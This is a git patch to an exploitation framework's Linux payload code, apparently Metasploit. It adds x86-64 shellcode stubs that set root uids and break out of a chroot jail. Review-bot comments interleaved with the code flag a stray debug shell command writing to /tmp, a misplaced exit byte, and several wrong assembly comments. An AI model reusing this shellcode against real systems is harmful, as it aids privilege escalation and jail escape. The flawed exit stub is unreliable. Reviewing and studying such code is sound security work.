From fe2caf2fe402deee9e925cf18dd2293da5fdbdd4 Mon Sep 17 00:00:00 2001
From: Maciej Kotowicz
Date: Thu, 26 Jan 2012 00:51:06 +0100
Subject: [PATCH] `advance` linux x64 payloads
---
 lib/msf/core/payload/linux.rb | 93 +++++++++++++++++++++++++++++++++++
 1 file changed, 93 insertions(+)
diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb
index 77f56462a2..1f9779a852 100644
--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -124,6 +124,7 @@ module Msf::Payload::Linux
 # build ".." str (ptr in ebx)
 "\x31\xc0" +# xorl %eax,%eax #
 "\x50" +# pushl %eax #
+ "\x66\x68\x2e\x2e" +# pushw $0x2e2e #
 "\x89\xe3" +# movl %esp,%ebx #
 # loop changing dir
@@ -137,6 +138,7 @@ module Msf::Payload::Linux
 "\x89\xd9" +# movl %ebx,%ecx #
 "\x58" +# popl %eax #
 "\xcd\x80" # int $0x80 #
+ `echo "foo size: #{pre.size}" > /tmp/dupa`
 end
 # Append
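Review bot: The added line `` `echo "foo size: #{pre.size}" > /tmp/dupa` `` in the second hunk is leftover debugging and should be dropped before merge: it spawns a shell on every payload build and writes to a fixed, predictable path in the world-shared /tmp of the host generating the payload, which is both a side effect callers of this method do not expect and a habit (interpolating values into a backtick command) that is unsafe the moment the interpolated value is not a plain integer. If a size trace is genuinely wanted it belongs in the framework's debug logging, not in a shell command. The surrounding x86 PrependChrootBreak block and its enclosing method continue outside the hunk.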
@@ -203,7 +205,98 @@ module Msf::Payload::Linux
 "\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
 "\x44\xff\xff\x02" # sc #
 end
+ end
+ if (test_arch.include?(ARCH_X86_64))
+
+ if (datastore['PrependSetresuid'])
+ # setresuid(0, 0, 0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x48\x89\xfe" # mov rsi,rdi #
+ pre << "\x6a\x75" # push 0x75 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+
+ end
+
+ if (datastore['PrependSetreuid'])
+ # setreuid(0, 0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x48\x89\xfe" # mov rsi,rdi #
+ pre << "\x6a\x71" # push 0x71 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+
+ end
+
+ if (datastore['PrependSetuid'])
+ # setuid(0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x6a\x69" # push 0x69 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ end
+
+ if (datastore['PrependChrootBreak'])
+
+ # setreuid(0, 0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x48\x89\xfe" # mov rax,rdi #
+ pre << "\x48\x89\xf8" # mov rax,rdi #
+ pre << "\xb0\x71" # mov al,0x71 #
+ pre << "\x0f\x05" # syscall #
+
+ # generate temp dir name
+ pre << "\x48\xbf" # mov rdi, #
+ pre << Rex::Text.rand_text_alpha(8) # random #
+ pre << "\x56" # push rsi #
+ pre << "\x57" # push rdi #
+
+ # mkdir(random,0755)
+ pre << "\x48\x89\xe7" # mov rdi,rsp #
+ pre << "\x66\xbe\xed\x01" # mov si,0755 #
+ pre << "\x6a\x53" # push 0x53 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+
+ # chroot(random)
+ pre << "\x48\x31\xd2" # xor rdx,rdx #
+ pre << "\xb2\xa1" # mov dl,0xa1 #
+ pre << "\x48\x89\xd0" # mov rax,rdx #
+ pre << "\x0f\x05" # syscall #
+
+ # build .. (ptr in rdi )
+ pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e #
+ pre << "\x56" # push rsi #
+ pre << "\x48\x89\xe7" # mov rdi,rsp #
+
+ # loop chdir(..) 69 times
+ # syscall tendo to modify rcx can't use loop...
+ pre << "\x6a\x69" # push 0x45 #
+ pre << "\x5b" # pop rbx #
+ pre << "\x6a\x50" # push 0x50 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ pre << "\xfe\xcb" # dec bl #
+ pre << "\x75\xf7" # jnz -7 #
+
+ # chrot (.) (witch should by /)
+ pre << "\x6a\x2e" # push . (0x2e) #
+ pre << "\x48\x89\xe7" # mov rdi,rsp #
+ pre << "\x48\x89\xd0" # mov rax,rdx #
+ pre << "\x0f\x05" # syscall #
+
+ end
+
+ # Append
+
+ # exit(0)
+ if (datastore['AppendExit'])
+ app << "\x48\x31\xff" # xor rdi,rdi #
+ app << "\x48\x89\xf8" # mov rax,rdi #
+ pre << "\xb0\x3c" # mov al,0x69 #
+ app << "\x0f\x05" # syscall #
+ end
 end
 return (pre + buf + app)
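Review bot: In the AppendExit block `pre << "\xb0\x3c"` puts the `mov al,0x3c` on the prepended side instead of the appended one, so the stub that actually follows the payload is `xor rdi,rdi; mov rax,rdi; syscall` (syscall 0, not exit) and execution falls through into whatever bytes follow the buffer; the line should read `app << "\xb0\x3c" # mov al,0x3c #` (the comment's `0x69` is wrong too, exit is 60 on x86-64). Several other comments in this hunk disagree with their bytes and will mislead the next reader: `"\x48\x89\xfe"` in the PrependChrootBreak setreuid is `mov rsi,rdi`, not `mov rax,rdi`; `"\x6a\x69"` is `push 0x69`, so the chdir loop runs 105 times rather than the 69 promised above it; and `"\x75\xf7"` is `jnz -9`, which is the correct displacement back to `push 0x50` despite the `-7` in the comment. The final chroot(".") reuses rdx from the earlier `mov dl,0xa1` on the assumption that the intervening chdir syscalls leave rdx intact, which holds for the x86-64 syscall ABI (only rcx and r11 are clobbered) but deserves a comment next to the `mov rax,rdx`. The enclosing method continues past the end of the hunk.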